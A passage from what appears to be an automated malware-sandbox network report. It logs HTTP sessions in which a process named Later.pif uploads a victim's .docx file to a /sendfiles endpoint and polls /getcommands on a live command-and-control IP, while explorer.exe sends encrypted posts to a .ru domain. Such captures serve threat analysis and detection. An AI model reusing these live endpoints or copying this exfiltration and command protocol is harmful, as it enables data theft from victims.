IVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBET [TRUNCATED]
                                      Jul 15, 2024 06:13:30.403887033 CEST6OUTData Raw: 9c 5d ab 52
                                      Data Ascii: ]R
                                      Jul 15, 2024 06:13:31.135555029 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:31 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=aqkvpmvofl90sigf8va5e9jjco; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.54975446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:31.409737110 CEST1236OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1129
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=XQACHMZIHU.docx<AND>file=XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLA [TRUNCATED]
                                      Jul 15, 2024 06:13:31.409737110 CEST6OUTData Raw: 9d aa ab 52
                                      Data Ascii: R
                                      Jul 15, 2024 06:13:32.240799904 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:32 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=umi59gv22k1jktl5lvi1so22ak; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.54975546.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:32.372627020 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=1
                                      Jul 15, 2024 06:13:33.062006950 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:32 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=fg0dvaul0v87u23kirggpdte1l; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.54975646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:33.184720039 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=2
                                      Jul 15, 2024 06:13:33.875711918 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:33 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=6svegl45hdc4mc1fcuhl39mrnk; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.54975746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:33.993194103 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=3
                                      Jul 15, 2024 06:13:34.700542927 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:34 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=r1sn0hhctt3q1gagq4k0t0jle2; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.549758186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:34.450016022 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://woemrmcgjefexq.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 338
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:34.450048923 CEST338OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 03 e5 e1
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu_P_^\1<KE\|v>}hcQAHkX)To@;41f3.3H?uQq1VM?#Nb@h1nVlFM
                                      Jul 15, 2024 06:13:35.504586935 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:35 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.54975946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:34.830212116 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=4
                                      Jul 15, 2024 06:13:35.526278973 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:35 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=01j9v1rmhml8b8hv7g7ec6m0fk; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.54976046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:35.648220062 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 35
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=5
                                      Jul 15, 2024 06:13:36.338210106 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:36 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=km3amad7kigdcm3tr71s7kqoia; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.54976146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:36.461169004 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 36
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=6
                                      Jul 15, 2024 06:13:37.280277967 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:37 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=1vgicjbfktp49vcjkmb2s76om8; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.54976246.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:37.401891947 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 37
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=7
                                      Jul 15, 2024 06:13:38.115818024 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:38 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=o0jvpd8cmhasg5iqtl98alpiet; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.54976346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:38.228734016 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 38
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=8
                                      Jul 15, 2024 06:13:38.917354107 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:38 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=ap2470ikorktc07tk7ig9g0744; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.54976446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:39.039186954 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 39
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=9
                                      Jul 15, 2024 06:13:39.754393101 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:39 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=0mgiiml9l94eaj90344d7l1gh3; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.549765186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:39.810580015 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://wkabmnjjuon.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 184
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:39.810616016 CEST184OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 06 c4 96
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu'T8|Dy1|(wt%J@uzdCO+)7A)7E:x/y9</Ff
                                      Jul 15, 2024 06:13:40.900899887 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.54976646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:39.870352030 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 30
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=10
                                      Jul 15, 2024 06:13:40.563427925 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:40 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=j1lmt8335e6cgaevakjnll3v2q; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.54976746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:40.685163021 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 31
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=11
                                      Jul 15, 2024 06:13:41.379894018 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:41 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=gpnv39s5mpuqemf5qhth9vkrjd; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.54976846.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:41.520900965 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 32
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=12
                                      Jul 15, 2024 06:13:42.212558985 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:42 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=okv13m71ekjc413qdnt9hvda5u; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      54192.168.2.54976946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:42.340989113 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 33
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=13
                                      Jul 15, 2024 06:13:43.048222065 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:42 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=58bog49l3t51ckfp2ncg00gvcd; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      55192.168.2.54977046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:43.164518118 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 34
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=14
                                      Jul 15, 2024 06:13:43.852001905 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:43 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
